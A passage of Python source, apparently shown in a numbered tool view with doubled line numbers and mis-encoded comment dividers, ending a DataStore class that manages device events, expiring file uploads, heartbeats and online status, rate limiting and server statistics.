   554в†’   554в†’            await self.save_events()
   555в†’   555в†’
   556в†’   556в†’    async def get_events(self, device_id: str = None, event_type: str = None, limit: int = 100) -> List[dict]:
   557в†’   557в†’        events = self.events
   558в†’   558в†’        if device_id:
   559в†’   559в†’            events = [e for e in events if e.get('device_id') == device_id]
   560в†’   560в†’        if event_type:
   561в†’   561в†’            events = [e for e in events if e.get('level') == event_type]
   562в†’   562в†’        return list(reversed(events[-limit:]))
   563в†’   563в†’
   564в†’   564в†’    # в”Ђв”Ђв”Ђ File Management (Temporary Storage) в”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђ
   565в†’   565в†’    
   566в†’   566в†’    async def add_file(self, device_id: str, filename: str, file_type: str,
   567в†’   567в†’                       size: int, command_id: str = None, caption: str = "") -> dict:
   568в†’   568в†’        file_id = str(uuid.uuid4())
   569в†’   569в†’        now = datetime.utcnow()
   570в†’   570в†’        file_data = {
   571в†’   571в†’            "id": file_id,
   572в†’   572в†’            "device_id": device_id,
   573в†’   573в†’            "filename": filename,
   574в†’   574в†’            "file_type": file_type,
   575в†’   575в†’            "size": size,
   576в†’   576в†’            "uploaded_at": now.isoformat(),
   577в†’   577в†’            "expires_at": (now + timedelta(seconds=FILE_TEMP_EXPIRE_SECONDS)).isoformat(),
   578в†’   578в†’            "retrieved": False,
   579в†’   579в†’            "command_id": command_id,
   580в†’   580в†’            "caption": caption,
   581в†’   581в†’            "path": os.path.join(UPLOADS_DIR, f"{device_id}_{filename}"),
   582в†’   582в†’        }
   583в†’   583в†’        self.files[file_id] = file_data
   584в†’   584в†’        return file_data
   585в†’   585в†’
   586в†’   586в†’    async def get_file(self, file_id: str) -> Optional[dict]:
   587в†’   587в†’        return self.files.get(file_id)
   588в†’   588в†’
   589в†’   589в†’    async def mark_file_retrieved(self, file_id: str):
   590в†’   590в†’        f = self.files.get(file_id)
   591в†’   591в†’        if f:
   592в†’   592в†’            f['retrieved'] = True
   593в†’   593в†’
   594в†’   594в†’    async def cleanup_expired_files(self):
   595в†’   595в†’        """Remove files that have expired or been retrieved."""
   596в†’   596в†’        now = datetime.utcnow()
   597в†’   597в†’        to_remove = []
   598в†’   598в†’        for fid, f in self.files.items():
   599в†’   599в†’            try:
   600в†’   600в†’                expires = datetime.fromisoformat(f['expires_at'])
   601в†’   601в†’                should_remove = (now > expires) or f.get('retrieved', False)
   602в†’   602в†’                if should_remove:
   603в†’   603в†’                    to_remove.append(fid)
   604в†’   604в†’                    # Delete actual file
   605в†’   605в†’                    path = f.get('path', '')
   606в†’   606в†’                    if path and os.path.exists(path):
   607в†’   607в†’                        try:
   608в†’   608в†’                            os.remove(path)
   609в†’   609в†’                        except OSError:
   610в†’   610в†’                            pass
   611в†’   611в†’            except (ValueError, KeyError):
   612в†’   612в†’                to_remove.append(fid)
   613в†’   613в†’        for fid in to_remove:
   614в†’   614в†’            del self.files[fid]
   615в†’   615в†’
   616в†’   616в†’    # в”Ђв”Ђв”Ђ Device Heartbeat & Status в”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђ
   617в†’   617в†’    
   618в†’   618в†’    async def update_heartbeat(self, device_id: str, status: str, battery: int = None):
   619в†’   619в†’        device = self.devices.get(device_id)
   620в†’   620в†’        if not device:
   621в†’   621в†’            return
   622в†’   622в†’        now = datetime.utcnow().isoformat()
   623в†’   623в†’        device['last_seen'] = now
   624в†’   624в†’        if battery is not None:
   625в†’   625в†’            device['battery'] = battery
   626в†’   626в†’        
   627в†’   627в†’        was_offline = not self._device_last_online.get(device_id, False)
   628в†’   628в†’        is_online = status == "online"
   629в†’   629в†’        self._device_last_online[device_id] = is_online
   630в†’   630в†’        
   631в†’   631в†’        if was_offline and is_online:
   632в†’   632в†’            await self.add_event("connection", f"Device online: {device.get('name', device_id)}", "success", device_id=device_id)
   633в†’   633в†’        elif not was_offline and not is_online:
   634в†’   634в†’            await self.add_event("connection", f"Device offline: {device.get('name', device_id)}", "warning", device_id=device_id)
   635в†’   635в†’
   636в†’   636в†’    async def check_device_online_status(self):
   637в†’   637в†’        """Background task: mark devices offline if no heartbeat."""
   638в†’   638в†’        now = time.time()
   639в†’   639в†’        for device_id, online in list(self._device_last_online.items()):
   640в†’   640в†’            if online:
   641в†’   641в†’                device = self.devices.get(device_id)
   642в†’   642в†’                if device:
   643в†’   643в†’                    try:
   644в†’   644в†’                        last_str = device.get('last_seen', '')
   645в†’   645в†’                        if not last_str:
   646в†’   646в†’                            continue
   647в†’   647в†’                        last_dt = datetime.fromisoformat(last_str)
   648в†’   648в†’                        if last_dt.tzinfo is not None:
   649в†’   649в†’                            last_dt = last_dt.replace(tzinfo=None)
   650в†’   650в†’                        last_ts = last_dt.timestamp()
   651в†’   651в†’                        if now - last_ts > DEVICE_OFFLINE_TIMEOUT:
   652в†’   652в†’                            self._device_last_online[device_id] = False
   653в†’   653в†’                            await self.add_event("connection", f"Device offline (timeout): {device.get('name', device_id)}", "warning", device_id=device_id)
   654в†’   654в†’                    except (ValueError, TypeError):
   655в†’   655в†’                        pass
   656в†’   656в†’
   657в†’   657в†’    # в”Ђв”Ђв”Ђ Rate Limiting в”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђ
   658в†’   658в†’    
   659в†’   659в†’    def check_rate_limit(self, key: str, max_count: int, window: float) -> bool:
   660в†’   660в†’        """Returns True if request is allowed, False if rate limited."""
   661в†’   661в†’        now = time.time()
   662в†’   662в†’        timestamps = self._rate_counters.setdefault(key, [])
   663в†’   663в†’        # Clean old entries
   664в†’   664в†’        timestamps[:] = [t for t in timestamps if now - t < window]
   665в†’   665в†’        if len(timestamps) >= max_count:
   666в†’   666в†’            return False
   667в†’   667в†’        timestamps.append(now)
   668в†’   668в†’        return True
   669в†’   669в†’
   670в†’   670в†’    # в”Ђв”Ђв”Ђ Statistics в”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђ
   671в†’   671в†’    
   672в†’   672в†’    def get_stats(self) -> dict:
   673в†’   673в†’        total_devices = len(self.devices)
   674в†’   674в†’        online_devices = sum(1 for d in self.devices.values() if self._device_last_online.get(d['id'], False))
   675в†’   675в†’        pending_commands = sum(1 for c in self.commands.values() if c['status'] == 'pending')
   676в†’   676в†’        completed_commands = sum(1 for c in self.commands.values() if c['status'] == 'completed')
   677в†’   677в†’        total_commands = len(self.commands)
   678в†’   678в†’        total_users = len(self.users)
   679в†’   679в†’        
   680в†’   680в†’        return {
   681в†’   681в†’            "uptime": int(time.time() - self.start_time),
   682в†’   682в†’            "devices_total": total_devices,
   683в†’   683в†’            "devices_online": online_devices,
   684в†’   684в†’            "devices_offline": total_devices - online_devices,
   685в†’   685в†’            "commands_total": total_commands,
   686в†’   686в†’            "commands_pending": pending_commands,
   687в†’   687в†’            "commands_completed": completed_commands,
   688в†’   688в†’            "events_count": len(self.events),
   689в†’   689в†’            "users_total": total_users,
   690в†’   690в†’            "api_hits": self.api_hits,
   691в†’   691в†’            "messages_sent": self.messages_sent,
   692в†’   692в†’            "files_active": len(self.files),
   693в†’   693в†’            "version": VERSION,
   694в†’   694в†’        }
   695в†’   695в†’
   696в†’   696в†’# в”Ђв”Ђв”Ђ Global Instance в”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђ
   697в†’   697в†’from .config import VERSION, FILE_TEMP_EXPIRE_SECONDS
   698в†’   698в†’import secrets
   699в†’   699в†’
   700в†’   700в†’store = DataStore()